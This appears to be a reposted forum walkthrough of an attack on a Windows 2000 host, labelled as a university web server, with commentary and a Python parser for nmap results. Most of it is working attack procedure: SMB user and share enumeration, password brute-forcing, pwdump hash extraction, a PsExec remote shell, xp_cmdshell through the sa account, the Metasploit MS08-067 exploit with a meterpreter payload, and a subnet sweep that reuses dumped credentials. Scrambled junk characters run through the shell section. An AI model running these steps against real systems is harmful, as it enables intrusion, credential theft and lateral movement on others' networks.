Target: Guangxi Normal University website, http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds

Two details of this first scan frame everything that follows. Nmap only reports a MAC address for hosts on the same Ethernet segment, and 08:00:27 (Cadmus Computer Systems) is the OUI VirtualBox assigns to guest adapters, so despite the public address this target is a VM next to the BackTrack box. And 445/tcp fingerprints as Windows 2000 with Terminal Services (3389/tcp) open: an old, SMB-exposed host, which is exactly what the SMB script family below is written for.
) Q" h3 x' o; }* k9 I+ X1 Zroot@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本
; T, E, C% @( \
% ?. G$ X8 t. \6 ~ N y-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse
- d4 F6 @( G1 V, z+ ?! B0 t
$ u- J/ b2 J# R3 [2 T-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse% c9 E, E2 z0 [5 K* h
% E/ i% o& U K5 ^+ u7 ]-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse- w/ R: C5 Q8 d P7 G4 U9 X
6 q2 u s T. P. I-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse
- M/ N5 f1 ~4 f# R2 w" B; D5 W6 a
-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse3 \7 I- y2 e; t9 L2 M5 S6 M. V
- Q& Q3 w; C3 x& @, ?$ B
-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
; F' ~: R$ q3 _! H2 ?) R. [; j6 f$ ~6 ~% i- ~2 G7 H% ~: J
-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse0 k4 h2 \# Y, s: c& K
3 ^3 U7 A. _4 d) A+ g" E' Q+ s
-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse3 T& \5 V5 f* x- x9 S I: b0 c
1 c% e" j) O& y- Y; D& P% S, `-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse0 A1 }) F" ^# t( d- k- Z
4 F" P \ K i" ^. K" d-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse: l5 b& z/ j8 Z! ^8 s, D- h
8 W! b* ~9 L. w-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
- @2 [4 [2 c3 h( }% d1 i; Q5 X* @/ z/ T: R
-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse
7 c ?. R! Q- x: _+ p
/ z" R. g5 F& F$ l-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse
, _" c: d8 B- i& s C( m6 s/ V- a8 \# U% l4 Q+ {* U- _# |
-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
+ S: g; y Q' d& M( Z5 Y1 r# A- q$ r, t+ X
-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse
, P- A$ D4 y4 d) W; Z, R! ~7 }) I5 e: T0 Q
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// use the script to enumerate the accounts that exist on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser    // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds

No credentials were supplied here, so the user list came back over a null session; the share listing further down shows why that works (IPC$ allows anonymous READ). TsInternetUser is the Terminal Services Internet Connector account Windows 2000 creates by default, which again points at a stock installation.
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
// list the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
// guess the users' passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds

With no userdb/passdb arguments smb-brute uses Nmap's built-in username and password lists from nselib/data, and a blank password is among the first things it tries. On a host with an account-lockout policy this step would lock Administrator out instead of logging in; smb-brute checks the lockout policy first and refuses to continue unless the smblockout argument is set, so read the policy before running it against anything that matters.
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2    // grab the password hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
|   Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
|   Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
|   test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_  TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds

Reading the dump: each line is user:RID => LM hash:NT hash. pwdump prints NO PASSWORD in place of the well-known hashes of an empty password, so Administrator and Guest confirm the blank login smb-brute already found. The LM hash for test ends in AAD3B435B51404EE, the LM value of an empty 7-byte half, so that password is at most seven characters, consistent with 123456. The pwdump binaries are extracted into nselib/data because smb-pwdump drives them through the smb-psexec machinery: it copies the executable over and starts it via the service control manager, which requires an account with administrative rights on the target. That it succeeds as test, and that PsExec below gives a shell with the same account, tells you test is a local administrator on this box.
& y; n7 q3 d6 V" YC:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell0 V% `6 J, N$ m: Z8 _
) M# Z& D& j1 ?& x3 o1 i
-p 123456 -e cmd.exe
. Y9 J' x8 c4 @, K
; \+ L7 K* u; e D' a: FPsExec v1.55 – Execute processes remotely
_+ M! J) _) ?4 Q/ ]7 R
. H0 {! U% { l9 O* R* j, oCopyright (C) 2001-2004 Mark Russinovich
/ d" V7 o* Q8 |. |
' q9 A' T9 p5 Z- p6 b) ]& qSysinternals – www.sysinternals.com2 M: _9 `, L( r0 \% D; S1 g
/ F8 r7 k, W( _) O+ uMicrosoft Windows 2000 [Version 5.00.2195]
$ V' R4 {6 y5 ^5 Z. ?3 A4 u4 x- H5 A7 L0 W7 ~, V7 b: z
(C) 版权所有 1985-2000 Microsoft Corp.; e: \% z) j. k* f) ~. y, `9 F
9 @5 d @1 r U4 Q5 W$ P
C:\WINNT\system32>ipconfig
/ Y* x) K0 T/ q3 X3 ?# G2 V, i! D& a( s+ P) H
Windows 2000 IP Configuration6 c/ Z2 O4 Z3 I7 ?/ G7 x
; y- S. h- C0 I8 Y# I+ {Ethernet adapter 本地连接:( a+ p/ B- j& E- Q h( p
/ _: V; Y k& q0 S! N
Connection-specific DNS Suffix . :+ L9 y; x. t# g" R; v. P) e
W' J$ \: C$ Z4 g C" t
IP Address. . . . . . . . . . . . : 202.103.242.2413 n/ q: S% `& U2 v
0 Z; D0 n$ f6 ?% u
Subnet Mask . . . . . . . . . . . : 255.255.255.01 W) W! U/ S7 t! ]) q
, Z$ K, O" N, M; z* ]5 b* S: Y/ xDefault Gateway . . . . . . . . . : 202.103.1.1; d" T+ d7 t" M/ \
( L% ]0 v. o' |& V3 h( v
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令
8 `0 T6 _& z8 ]' G/ L9 m7 ?: H+ N% h
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241    // check the target for known vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds

The MS08-067 verdict comes from an active probe of the Server service over SMB, not from a version lookup, so VULNERABLE here is reliable. In current Nmap releases smb-check-vulns has been split into the individual smb-vuln-* scripts; the equivalent of this check is smb-vuln-ms08-067.
root@bt:~# msfconsole    // use the MS08-067 exploit in msf to overflow the target

msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf exploit(ms08_067_netapi) > show payloads
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit

meterpreter >
Background session 2? [y/N]  (ctrl+z)
msf exploit(ms08_067_netapi) > sessions -l

Two choices here matter in practice. bind_tcp makes the target listen and the attacker connect in, which works on a flat lab segment but not through a firewall that filters inbound connections to the target; reverse_tcp is the usual alternative. The module's default Automatic Targeting fingerprints the host over SMB to pick return addresses for its Windows version and language; a wrong target crashes the Server service instead of returning a session, so against a production host confirm the target and leave only one exploit attempt.
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
// use the usernames and the dumped hash to try to log into the whole internal subnet

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

Attack successful: a simple msf + nmap attack.

Note what the sweep actually proved. password.txt holds the LM hash dumped for test, not a cleartext password, the intent being to reuse dumped material across the subnet. The only hit reported is administrator with a blank password, which smb-brute finds on its own before consulting the password list; nothing in the output shows the hash entry being accepted, so this result is credential reuse (the same blank Administrator password on a second host), not a demonstration of pass-the-hash.
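As an added example that is not from the original post: a parser for Nmap's normal output that collects each host's Host script results so a 254-address sweep like the one above can be triaged mechanically instead of read by eye. The sample output is constructed: the first host copies the 192.168.1.105 result above, the second host (192.168.1.110) is invented to show all three findings this walkthrough relied on (a working SMB login, an anonymously readable share, an MS08-067 VULNERABLE verdict).

```python
import re

# Constructed sample in the shape Nmap 5.x prints. 192.168.1.105 copies the
# result above; 192.168.1.110 is made up for this example.
SAMPLE_SWEEP = """\
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 01:00 CST
Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
445/tcp  open  microsoft-ds
MAC Address: 08:00:27:00:00:01 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

Nmap scan report for 192.168.1.110
Host is up (0.0011s latency).
PORT     STATE SERVICE
445/tcp  open  microsoft-ds

Host script results:
| smb-brute:
|_  test:123456 => Login was successful
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 254 IP addresses (2 hosts up) scanned in 60.00 seconds
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+?)(?: \(([\d.]+)\))?$")


def parse_sweep(text: str) -> dict:
    """Map each host's IP to {script name: [result lines]} from Nmap normal output."""
    hosts, current, script, in_scripts = {}, None, None, False
    for raw in text.splitlines():
        m = HOST_RE.match(raw)
        if m:
            current = m.group(2) or m.group(1)   # prefer the IP in parentheses
            hosts[current] = {}
            script, in_scripts = None, False
            continue
        if current is None:
            continue
        if raw.startswith("Host script results:"):
            in_scripts = True
            continue
        if not raw.startswith("|"):
            in_scripts = False                   # the block ends at the first non-"|" line
            continue
        if not in_scripts:
            continue                             # port-script output, not wanted here
        body = raw.lstrip("|_").rstrip()
        indent = len(body) - len(body.lstrip(" "))
        item = body.strip()
        if indent == 1 and item.endswith(":"):   # "| smb-brute:" names the script
            script = item[:-1]
            hosts[current][script] = []
        elif script is not None:
            hosts[current][script].append(item)
    return hosts


def triage(hosts: dict) -> list:
    """Flag what the walkthrough above exploits: working SMB logins,
    anonymous-readable shares and an MS08-067 VULNERABLE verdict."""
    findings = []
    for ip, scripts in hosts.items():
        for line in scripts.get("smb-brute", []):
            if line.endswith("Login was successful"):
                findings.append((ip, "valid-smb-login", line.split(" =>")[0]))
        shares = scripts.get("smb-enum-shares", [])
        for name, access in zip(shares, shares[1:]):   # share name, then its access line
            if access.startswith("Anonymous access:") and not access.endswith("<none>"):
                findings.append((ip, "anonymous-share", f"{name} {access.split(': ', 1)[1]}"))
        for line in scripts.get("smb-check-vulns", []):
            verdict = line.split(": ", 1)
            if len(verdict) == 2 and verdict[1] == "VULNERABLE":
                findings.append((ip, "vuln", verdict[0]))
    return findings


if __name__ == "__main__":
    for ip, kind, detail in triage(parse_sweep(SAMPLE_SWEEP)):
        print(f"{ip:<16} {kind:<18} {detail}")
```

Feed it the saved output of a sweep (nmap -oN sweep.txt ...) and the findings list is what you would otherwise scroll for; the same parser handles the single-host reports earlier on this page, since Nmap prints "Nmap scan report for bogon (202.103.242.241)" and the regex keeps the address in parentheses.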